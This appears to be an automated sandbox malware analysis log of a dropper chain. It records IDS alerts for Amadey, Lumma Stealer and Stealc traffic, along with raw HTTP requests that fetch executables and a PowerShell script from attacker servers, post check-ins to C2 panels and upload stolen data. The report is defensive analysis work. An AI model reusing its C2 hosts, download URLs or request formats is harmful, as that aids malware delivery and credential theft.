                              Source: Binary string: wntdll.pdb source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: C:\Users\Admin\source\repos\Absolut\Absolut\obj\Release\Absolut.pdb source: pwHxMTy.exe, 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, pwHxMTy.exe, 0000002D.00000000.1699171423.0000000000FF2000.00000002.00000001.01000000.00000022.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475931194.000000006D681000.00000020.00000001.01000000.00000016.sdmp, SplashWin.exe, 00000011.00000003.1467481979.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1541298389.000000006CF71000.00000020.00000001.01000000.0000001A.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, SplashWin.exe, 00000011.00000002.1475681626.000000006D601000.00000020.00000001.01000000.00000017.sdmp, SplashWin.exe, 00000012.00000002.1540622430.000000006CDA1000.00000020.00000001.01000000.0000001B.sdmp, SplashWin.exe, 00000030.00000002.1941370087.000000006CF11000.00000020.00000001.01000000.0000001B.sdmp
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exe Code function: 0_2_00FA2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00FA2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe Code function: 1_2_00922390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00922390
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_6D6120D0 _Open_dir,FindFirstFileExW,__Read_dir,FindClose,17_2_6D6120D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\AppData\Local\Temp\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\AppData\Local\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe File opened: C:\Users\user~1\AppData\

                              Networking

                              Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49696 -> 176.113.115.6:80
                              Source: Network traffic Suricata IDS: 2060568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (techspherxe .top) : 192.168.2.7:52157 -> 1.1.1.1:53
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49717 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49723 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49721 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2856096 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M1) : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network traffic Suricata IDS: 2060658 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (agroecologyguide .digital) in TLS SNI : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49727 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network traffic Suricata IDS: 2060657 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (agroecologyguide .digital) : 192.168.2.7:53182 -> 1.1.1.1:53
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49730 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.7:49732
                              Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49737 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49738 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.7:49732
                              Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network traffic Suricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49754 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.7:49834 -> 1.1.1.1:53
                              Source: Network traffic Suricata IDS: 2060658 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (agroecologyguide .digital) in TLS SNI : 192.168.2.7:49759 -> 104.21.48.201:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49717 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49721 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49738 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49754 -> 172.67.214.226:443
                              Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.183.32.103 3333
                              Source: Malware configuration extractor IPs: 176.113.115.6
                              Source: global traffic TCP traffic: 192.168.2.7:49708 -> 185.183.32.103:3333
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:10:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 07 Mar 2025 11:07:52 GMT ETag: "9ec0c8-62fbea24448ab" Accept-Ranges: bytes Content-Length: 10404040 Content-Type: application/x-msdos-program
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:10:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 11:00:14 GMT ETag: "37ee8e-62faa69169064" Accept-Ranges: bytes Content-Length: 3665550 Content-Type: application/x-msdos-program
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:10:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 13:44:33 GMT ETag: "6ecc00-62facb4bd9ae8" Accept-Ranges: bytes Content-Length: 7261184 Content-Type: application/x-msdos-program
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:10:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 07 Mar 2025 08:26:58 GMT ETag: "5d600-62fbc62d1c31e" Accept-Ranges: bytes Content-Length: 382464 Content-Type: application/x-msdos-program
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:10:52 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 15:34:23 GMT ETag: "156000-62fae3d90495a" Accept-Ranges: bytes Content-Length: 1400832 Content-Type: application/x-msdos-program
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 07 Mar 2025 17:11:03 GMT Content-Type: application/octet-stream Content-Length: 439296 Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT Connection: keep-alive ETag: "679bc634-6b400" Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 17:11:12 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 07 Mar 2025 04:18:30 GMT ETag: "1d2400-62fb8ea3d513f" Accept-Ranges: bytes Content-Length: 1909760 Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: GET /f/packed.exe HTTP/1.1 | Host: pulseon.top
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 162 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic | HTTP traffic detected: GET /files/7212159662/HmngBpR.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 38 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111840101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 32 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10112790101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/8032894631/9hUDDVk.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 34 34 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10114440101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/5153162918/pwHxMTy.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 34 36 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10114630101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/6491397189/T0QdO0l.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 35 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10115790101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/7853925217/ogfNbjS.ps1 HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 39 35 39 30 31 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10119590141&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /test/amnew.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 31 36 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10121660101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/5149365135/bncn6rv.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 37 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10122730101&unit=246122658369
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | IP Address: 176.113.115.7
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49698 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49704 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49718 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49717 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49720 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 185.215.113.16:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49733 -> 104.21.48.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49727 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49738 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49732 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.214.226:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49759 -> 104.21.48.201:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 140.82.121.4:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49736 -> 82.115.223.119:443
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 51 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=pu73agfU4ebSVvpoIZ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 14508 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=hO14yMOjbPAh | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15040 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=198fOZJDCuCQU0zaxR1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20400 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=pyhX63gw | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2457 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=gntS2y4q6Od9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 576430 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 89 | Host: defaulemot.run
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 41 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=w3jLG0ge3eXd6M | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 14478 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6RA1Fyx7Vw | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15020 | Host: fostinjec.today
